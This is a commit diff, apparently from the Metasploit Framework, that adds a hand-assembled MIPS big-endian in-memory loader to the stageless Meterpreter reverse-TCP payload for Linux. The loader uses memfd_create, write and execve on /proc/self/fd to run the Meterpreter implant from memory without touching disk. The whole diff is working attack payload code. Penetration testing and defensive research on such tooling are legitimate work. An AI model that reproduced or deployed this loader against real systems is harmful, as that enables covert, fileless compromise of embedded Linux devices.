feat(payload): linux/mips in_memory_loader for stageless meterpreter

dledda-r7 · dledda-r7 · commit 128ac84d64c7 · 2025-02-07T09:27:25.000-05:00
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
@@ -38,6 +38,63 @@ def generate(_opts = {})
       scheme: 'tcp',
       stageless: true
     }.merge(mettle_logging_config)
-    MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec
+    payload = MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec
+
+    size = payload.length
+    size_h = size >> 16
+    size_l = size & 0x0000ffff
+
+    in_memory_loader = [
+      0x00001025,               #    move    v0,zero
+      0x04510000,               #    bgezal  v0,4100f8 <myself>
+      0x27ff005c,               #    addiu   ra,ra,92
+      0xafa0fffc,               #    sw      zero,-4(sp)
+      0x27bdfffc,               #    addiu   sp,sp,-4
+      0x03a02020,               #    add     a0,sp,zero
+      0x2419fffe,               #    li      t9,-2
+      0x03202827,               #    nor     a1,t9,zero
+      0x34021102,               #    li      v0,0x1102
+      0x0101010c,               #    syscall 0x40404
+      0x03e02825,               #    move    a1,ra
+      (0x3c06 << 16 | size_h),  #    lui     a2,0x17
+      (0x34c6 << 16 | size_l),  #    ori     a2,a2,0x2fb8
+      0x00402025,               #    move    a0,v0
+      0x0080c825,               #    move    t9,a0
+      0x34020fa4,               #    li      v0,0xfa4
+      0x0101010c,               #    syscall 0x40404
+      0x27e7fffe,               #    addiu   a3,ra,-2
+      0x240e000a,               #    li      t6,10
+      0x24050016,               #    li      a1,22
+      0x13200011,               #    beqz    t9,410188 <execve>
+      0x00000000,               #    bnez    t6,410150 <itoa+0x10>
+      0x032e001a,               #    div     zero,t9,t6
+      0x00000000,               #    break   0x7
+      0x2401ffff,               #    li      at,-1
+      0x15c10004,               #    bne     t6,at,410168 <itoa+0x28>
+      0x3c018000,               #    lui     at,0x8000
+      0x17210002,               #    bne     t9,at,410168 <itoa+0x28>
+      0x00000000,               #    nop
+      0x00000000,               #    break   0x6
+      0x0000c812,               #    mflo    t9
+      0x0000c812,               #    mflo    t9
+      0x00005810,               #    mfhi    t3
+      0x256b0030,               #    addiu   t3,t3,48
+      0xa0eb0000,               #    sb      t3,0(a3)
+      0x24a5ffff,               #    addiu   a1,a1,-1
+      0x24e7ffff,               #    addiu   a3,a3,-1
+      0x1000ffee,               #    b       410140 <itoa>
+      0x00e52022,               #    sub     a0,a3,a1
+      0x2805ffff,               #    slti    a1,zero,-1
+      0x2806ffff,               #    slti    a2,zero,-1
+      0x34020fab,               #    li      v0,0xfab
+      0x0101010c,               #    syscall 0x40404
+      0x2f70726f,               #    sltiu   s0,k1,29295
+      0x632f7365,               #    .word   0x632f7365
+      0x6c662f66,               #    .word   0x6c662f66
+      0x642f2f2f,               #    .word   0x642f2f2f
+      0x2f2f2f2f,               #    sltiu   t7,t9,12079
+      0x2f2f2f00,               #    sltiu   t7,t9,12032
+    ].pack('N*')
+    in_memory_loader + payload
   end
 end
